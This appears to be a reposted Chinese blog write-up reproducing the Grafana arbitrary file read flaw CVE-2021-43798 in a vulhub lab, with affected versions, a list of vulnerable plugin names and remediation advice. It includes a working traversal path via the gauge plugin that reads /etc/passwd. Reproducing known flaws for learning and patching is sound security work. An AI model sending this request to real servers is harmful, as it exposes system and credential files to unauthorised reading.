Grafana任意文件读取漏洞复现(CVE-2021-43798)

1、漏洞描述

Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。2021年12月6日,国外安全研究人员披露Grafana中某些接口在提供静态文件时,攻击者通过构造恶意请求,可造成目录遍历,读取系统上的文件。

2、影响版本

Grafana 8.3.x < 8.3.1
Grafana 8.2.x < 8.2.7
Grafana 8.1.x < 8.1.8
Grafana 8.0.x < 8.0.7

3、环境搭建

使用vulhub搭建漏洞环境。
搭建完成后,访问一下

在这里插入图片描述

4、漏洞复现

访问http://192.168.10.171:3000/login,并抓包
在这里插入图片描述
修改请求路径为/public/plugins/gauge/../../../../../../../../etc/passwd,读取文件成功
在这里插入图片描述
受影响的plugins


alertmanager
grafana
loki
postgres
grafana-azure-monitor-datasource
mixed
prometheus
cloudwatch
graphite
mssql
tempo
dashboard
influxdb
mysql
testdata
elasticsearch
jaeger
opentsdb
zipkin
alertGroups
bargauge
debug
graph
live
piechart
status-history
timeseries
alertlist
candlestick
gauge
heatmap
logs
pluginlist
table
welcome
annolist
canvas
geomap
histogram
news
stat
table-old
xychart
barchart
dashlist
gettingstarted
icon
nodeGraph
state-timeline
text

5、安全建议

1、官方已于2021年12月8日发布新版本修复该漏洞,请尽快升级至安全版本。

2、设置Grafana仅对可信地址开放

3、利用Nginx等代理或者负载均衡设备禁止含有 .. 的请求以进行临时防御。

猜你喜欢

转载自blog.csdn.net/guo15890025019/article/details/122062811